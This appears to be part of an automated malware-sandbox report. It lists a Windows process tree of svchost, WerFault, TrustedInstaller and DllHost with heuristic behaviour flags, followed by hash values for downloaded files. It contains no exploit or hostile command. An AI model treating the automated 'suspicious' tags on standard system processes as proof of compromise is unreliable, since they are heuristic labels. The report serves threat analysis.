C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4100 -ip 41002⤵PID:4832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1312 -ip 13122⤵PID:4676
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 4248 -ip 42482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4992
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 3232 -ip 32322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3932
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3176 -ip 31762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:260
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 260 -ip 2602⤵PID:2428
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 4008 -ip 40082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3748
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3828
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3176
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3176 -s 2282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2088
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4008
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4008 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4912
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD5edc2971adb55fbd56cf0c5abc30b5320
SHA1727c16aa1272ff69df79bb39d5376732084371ca
SHA256be8845db2d6d5bf7ed462b15ca42c251781e2548ca02ebe48bebd31bd9625bdc
SHA512701af5934f884a834978272c747f349bf1cecbaedbe61907747d677f892a0f15ba2e68d8fad9fc5ce84baf35c47d745e73c0f468f39293f5556fd6db7ea6f435
-
Filesize
13KB
MD5912a84e5c88dccb7970379f76b9f7767
SHA128ddca0504c6f4dc3eccdb23cde6b320bf95da13
SHA2561de4f778d16abe418d9cfe091901fbe1a21abd471547f2505fc54d5f972a2558
SHA512f3dea1dffdea6268182ee93a1a81bf684a78cfc5967bb01b4bc442c44bde64e76db456fe590b04d7a8d90c66552018df7c0c0f2a438a8925f80b5dd9649cd1e6
-
Filesize
35KB
MD5f4ef2ef0a603c309632d8a19ccd86306
SHA18238df9d33255b1049d0df1ed7334d5b8a7da588
SHA256c7338ff8c45574e1c38005f73dcab005f2b8c925501500cc3776dd0ce9b5bdce
SHA512927d0d9c984afc6e3f73dcdb2755ee35ac43883149677209aeec02acfdc8b1609e652a3baef282853b83e925cd962fd41a024fc410897bc010c9dc7fd16ef9d4
-
Filesize
13KB
MD5533db9014a445e023c9d728c87d72d41
SHA12ac61fb34420dde320118e36808aad149ce1bdeb
SHA25607eac1d651c80eea3858bbd2d6bf8eb6a2ebc6fab8e6e9f72eb4af58d34860fa
SHA512d94f1e67dc8bf00a5675bb953ffd87e25293bfbb8a671a2cae76f4d861ded9431a09f835b8fe1c4a393423d715b27cdebf00c7cf10409052f9c68ccf27aecca0
-
Filesize
36KB
MD56e5f277667f7d0cab2c5f4cfa5fca45c
SHA185ac85bdcccef50d0c7c95115234de352c8290ee
SHA2560017b86e648f0637bc95d8233f90527d0978bd8b6e872f3c9b36b02f468a2397
SHA51229b193891ac2bfa34f5abfc474badd6199aa38693356e067477046b2c2ab69db01c43747eb36faf5158bfec31290f1677c06a74bef052f298f2de7a2c8ee8c85
-
Filesize
13KB
MD5c9aed76f52a027017779daec81956a27
SHA144d2f3f6abd8f6f4292af96024eb01fd164602b5
SHA2569b348829cce25a06e216a6a6873af09ab56e6a0f0e1750137589d4465728ab1a
SHA512c8ade81abce6cf4bc520a2af0f3d9fe4234711610c049cafea246d4d1c4703f25dfd89bdfe53d97131ad364a70611c3702e758099f94b6580916ba0f2b0e75c5
-
Filesize
35KB
MD51186cf2593b61385cee4aa486e01226b
SHA1c72c23a487dd3652215328eea8a795a2d38b7a21
SHA256ec9e3838b54bac87cdaf948df748778540c25facb831d676dd2f569762c590d4
SHA5124e892a2739945cd16ddb8ff4f81fa7064c88dbd1890b589a373da3fd73041da1670a15e2f426b84f039f62d76e3f263adbe3b0e96b9d6145007505910bf34683
-
Filesize
13KB
MD5527ccfd0579ae13daa5480c284915152
SHA1d14c4d67aa1d549c3d9a15ef7ad6b90178b75c0f
SHA256950e034e5b5331db2d3732047a218ea8141a6cdd739e1d237e6d1aae654b219a
SHA51222fdb0de06ad073778c73c76fb2a13add1b4f262a983851067da9ff346bad0c8ff591495aad908af15dff790faa9b8e7b259fc0924bd0a67669191375c69ecd1
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD515db1985e91cf3754604b9337a72ca47
SHA13451b17f81d8f80b33bd0184dc4e19b5be6b1196
SHA25648b46a9ecb43238a8cb32345e55c9d6ae0bedca1d7fc3e0c333211ecc2521ced
SHA51239e05c6375eff2d5d1b9d2c0e503e7c53b66be0c62e03312f9979381c1a1b26cedef56fd66c44aed013b6dd2cb36c238bf82ab0ed00eb0a5de4abcede577fe8f
-
Filesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5